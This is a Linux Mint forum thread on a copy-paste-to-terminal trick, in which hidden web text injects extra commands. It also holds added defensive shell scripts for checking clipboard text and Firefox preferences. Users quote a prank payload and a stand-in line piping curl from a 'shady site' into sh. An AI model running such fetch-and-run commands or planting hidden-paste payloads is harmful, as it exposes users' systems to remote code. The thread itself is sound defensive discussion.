Possible Exploit with Copy/Paste to Terminal?

Post by D Canard »

Here, perhaps, is an object lesson in the dangers of laziness when working with BASH or PowerShell or other terminal environments.

Command line stuff is often complicated and it is easy to make typos that are hard to see if you are tired, stressed and/or inexperienced, so people often copy commands from websites that offer instructions on how to do or fix something.

This copy/pasting of commands apparently can be exploited.

A techie friend, who brought this to my attention, has tested the (non-dangerous, not run as root) exploit demo outlined in the link below on his Android phone, and it works for him.

http://lifepluslinux.blogspot.com/2017/ ... te-to.html

This is cool in a worrisome sort of way. But I am pleased to say it doesn't work in my terminal on Linux Mint 20 copying from Vivaldi. I just get the normal output I would get from running ls -lat.

If I copy/paste the selection from the website into a text only app or paste without formatting into a word-processor app, I just get the text, ls-lat.

If I inspect the element, ls -lat, in the web page with Vivaldi's dev-tools, I can see that something is very wrong, but what is wrong seems not to copy/paste over.

Notwithstanding, I do copy/paste of command line code all the time. I guess I shouldn't be so lazy.
Last edited by LockBot on Wed Dec 28, 2022 7:16 am, edited 1 time in total.
Reason: Topic automatically closed 6 months after creation. New replies are no longer allowed.

Post by xenopeek »

I tried both in Firefox and Chromium but neither copies invisible text, so only the "ls -lat" text that is also visible in the browser is copied. I had to remove the "malicious" class from the span with the hidden text on the webpage to make it visible to be able to copy the (no longer) hidden text from Firefox or Chromium. Gnome Web did copy the text without having to make it visible.

I use Tilix as terminal and it prompted me with a warning when pasting the copied text with the malicious part in it:
Image

Gnome Terminal just ran it. I guess Gnome Web and Gnome Terminal could do with some improvement.

Post by Flemur »

I just get ls -lat in two terminals, two browsers and leafpad. I pasted it into leafpad, saved it as ls.txt, and then

Code:

$ od -a ls.txt
0000000   l   s  sp   -   l   a   t
0000007

Post by MrEen »

Interesting.

I selected the text in Brave, and on right click I have the option to "Search Google for "ls;clear..." etc, but when choosing Copy, it only copied the ls -lat.

Post by Termy »

There is nothing between ls and -lat for me, but I don't just allow every site script access. This is definitely worrisome though, if this is somehow catching people out. :? As if copy-pasting weren't problematic enough already.

BTW, the commands it was supposed to run are:

Code:

; clear; echo 'Haha! You gave me access to your computer with sudo!';
echo -ne 'h4cking ##                        (10%)\r';
sleep 0.3;
echo -ne 'h4cking ###                       (20%)\r';
sleep 0.3;
echo -ne 'h4cking #####                     (33%)\r';
sleep 0.3;
echo -ne 'h4cking #######                   (40%)\r';
sleep 0.3;
echo -ne 'h4cking ##########                (50%)\r';
sleep 0.3;
echo -ne 'h4cking #############             (66%)\r';
sleep 0.3;
echo -ne 'h4cking #####################     (99%)\r';
sleep 0.3;
echo -ne 'h4cking #######################   (100%)\r';
echo -ne '\n'; 
echo 'Hacking complete.';
echo 'Use GUI interface using visual basic to track my IP'<br /> ls
I got it from the page's source.

I suppose you can avoid something like this catching you out by pasting first in an editor. That said, not everyone will understand what they're looking at.
I'm also Terminalforlife on GitHub.
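
An added example, not part of the thread: a POSIX shell function that applies the kind of check discussed above (a paste warning, or looking at the text in an editor first) to clipboard text before it reaches the terminal. The name `check_paste` and the sample inputs are constructed here, and the `xclip` call in the comment assumes that tool is installed.

```shell
#!/bin/sh
# Added example (not from the thread): inspect text before pasting it into a
# terminal. Reads the candidate text on stdin; the optional first argument is
# the text you believe you selected on the page.
# Prints one finding per line; exit status 0 = no findings, 1 = findings.
# Typical use (assumes xclip is installed):
#   xclip -o -selection clipboard | check_paste 'ls -lat'
check_paste() (
    expected=${1-}
    # Read all of stdin; the trailing "x" keeps $(...) from eating newlines.
    text=$(cat; printf x); text=${text%x}
    nl='
'
    cr=$(printf '\r')
    findings=0

    # A newline makes the shell run the line the moment it is pasted.
    case $text in
        *"$nl"*|*"$cr"*) echo "newline: runs immediately on paste"; findings=1 ;;
    esac
    # Separators and substitutions allow extra commands on one line.
    case $text in
        *';'*|*'&'*|*'|'*|*'`'*|*'$('*)
            echo "separator: more than one command may run"; findings=1 ;;
    esac
    # Other control characters (escape sequences, backspace) can hide text.
    if printf %s "$text" | LC_ALL=C tr -d '\n\r\t' | LC_ALL=C grep -q '[[:cntrl:]]'
    then
        echo "control: non-printing control characters present"; findings=1
    fi
    # The core of the trick: the clipboard holds more than what was visible.
    if [ $# -gt 0 ] && [ "$text" != "$expected" ]; then
        echo "mismatch: clipboard differs from the text you selected"; findings=1
    fi
    [ "$findings" -eq 0 ]
)
```

A legitimate one-liner that uses a pipe or `&&` is also reported under `separator`; the finding means "read it before running it", not "this is malicious".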

Post by BenTrabetere »

The exploit did not work for me with Firefox and Gnome Terminal. I just got output from ls -lat.

The article claims, "This can be worse. If the code snippet had a command with sudo for instance, the malicious code will have sudo access too."

Please correct me if I am wrong, but if this was an exploit and the command had sudo, you would still have to enter your password in order for the command to work. Yes? (It upsets me to think that too many people would enter a password without hesitation.)

@Termy
+1 for pasting commands to a text editor before pasting to a terminal. I have been doing that for several years.

Post by xenopeek »

BenTrabetere wrote: Mon Jan 25, 2021 12:04 am if this was an exploit and the command had sudo, you would still have to enter your password
Yes.

Post by mmphosis »

One of the many things that I turn off in the Firefox about:config

dom.event.clipboardevents.enabled

https://briantracy.xyz/writing/copy-paste-shell.html

Post by Termy »

mmphosis wrote: Thu Jan 28, 2021 12:36 am dom.event.clipboardevents.enabled
Very nice! I'm going to incorporate a check for that into UbuChk. :D I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?

Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?

Post by xenopeek »

dom.event.clipboardevents.enabled is 'true' in my Firefox so I would expect that website to do something scary but it doesn't?

When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"

But on the terminal it again only pastes the visible text: echo "looks safe to me!". And it also prints "looks safe to me!" and nothing more.

Post by Termy »

xenopeek wrote: Thu Jan 28, 2021 10:12 am But on the terminal it again only pastes the visible text: echo "looks safe to me!". And it also prints "looks safe to me!" and nothing more.
Do you have scripting allowed for the page? You might actually have some other feature in place in your browser to protect against this. I use NoScript which blocks scripts unless I allow it.

Post by xenopeek »

As I shared, it does change the copied text when pasting here:
xenopeek wrote: Thu Jan 28, 2021 10:12 am When I copy the text in the red bar and paste it here, I do get this: echo "this could have been [curl http://myShadySite.com | sh]"

Post by Termy »

Oh yeah -- my bad. I misread.

Post by mmphosis »

Termy wrote: Thu Jan 28, 2021 9:28 am
mmphosis wrote: Thu Jan 28, 2021 12:36 am dom.event.clipboardevents.enabled
Very nice! I'm going to incorporate a check for that into UbuChk. :D I really should have a whole Firefox section for it. Do you know of any other awesome parameters to change for security or as an optimization?

Also, do you know if this is specifically for Firefox, or something which will work for most Firefox-based browsers?
Cool perl script project! The whole "Firefox about:config" is a topic unto itself. I have about 10 preferences set to false (unless otherwise specified) for personal preference and added security/privacy:
browser.backspace_action=2
geo.enabled
extensions.pocket.enabled
network.http.sendRefererHeader=0
browser.newtabpage.enabled
browser.urlbar.trimURLs
keyword.enabled
browser.fixup.alternate.enabled
media.autoplay.enabled
Here is a reference for many many more: https://github.com/arkenfox/user.js/blob/master/user.js

I also install uBlock Origin and uMatrix.

I use TenFourFox a Firefox-based browser for PowerPC Mac and the settings work the same as Firefox on Linux Mint. Some setting types change with newer and older versions of Firefox.
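
An added example, not from the thread and not from UbuChk: a POSIX shell check that reads a Firefox `prefs.js` or `user.js` file and reports which of the preferences named in this thread differ from the values given here. The function names and the file argument are assumptions made for the example; a preference with no `user_pref` line in the file is reported as `unset`, meaning Firefox's built-in default applies.

```shell
#!/bin/sh
# Added example (not from the thread). Assumes each preference sits on its
# own line starting at column 0, as Firefox writes them in prefs.js:
#   user_pref("geo.enabled", false);

# pref_state FILE NAME: print the value FILE sets for NAME, or "unset".
# The name is matched literally (index), so its dots are not regex wildcards.
pref_state() (
    awk -v key="user_pref(\"$2\"," '
        index($0, key) == 1 {
            v = substr($0, length(key) + 1)
            sub(/\);[ \t\r]*$/, "", v); sub(/^[ \t]+/, "", v)
            last = v                      # the last occurrence wins
        }
        END { print (last == "" ? "unset" : last) }' "$1"
)

# audit_prefs FILE: compare FILE with values taken from the thread; print one
# line per preference that differs. Exit status 0 only if all of them match.
audit_prefs() (
    bad=0
    while IFS='=' read -r name want; do
        have=$(pref_state "$1" "$name")
        if [ "$have" != "$want" ]; then
            echo "$name: want $want, have $have"; bad=1
        fi
    done <<EOF
dom.event.clipboardevents.enabled=false
geo.enabled=false
network.http.sendRefererHeader=0
keyword.enabled=false
EOF
    [ "$bad" -eq 0 ]
)
```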

Post by Termy »

mmphosis wrote: Thu Jan 28, 2021 6:55 pm ...
Thank you muchly! I'll look into all of those. Very cool stuff.

Update:

From looking into this a bit and actually starting to add it to UbuChk, I've run into some walls. Firefox does NOT make this process easy. :? Might make a thread for this, to see if anyone has managed to do this successfully, plus I don't want to derail this thread. It might just not be viable for UbuChk, sadly. :(

Done, in case anyone is curious: viewtopic.php?f=213&t=341311

Post by FreedomTruth »

xenopeek wrote: Mon Jan 25, 2021 3:53 am
BenTrabetere wrote: Mon Jan 25, 2021 12:04 am if this was an exploit and the command had sudo, you would still have to enter your password
Yes.
I realize I'm posting a month late to the discussion, but this may still be helpful to point out.
One thing about "sudo" use is that once you successfully use sudo in a terminal, you do not need to reenter your password to use it again for a set time (5 minutes?). Thus, if a user had recently run a sudo command, and then blindly pasted a malicious sudo command, it *could* run without re-asking for the password.

Post by Termy »

Yeah -- the password (credentials, specifically) is cached for 15 minutes, by default; this is mentioned in the sudo(8) manual page. This can be adjusted, however, to be as long or short as you like, by editing the '/etc/sudoers' file. Look at the sudoers(5) manual page for information on how to change this: man sudoers

Post by xenopeek »

You can run sudo -k to reset that timer so the next sudo command will ask for the password again. Also, the timer is per session: if you open a new terminal, or a new tab in your terminal, the first sudo command on that will always ask for the password.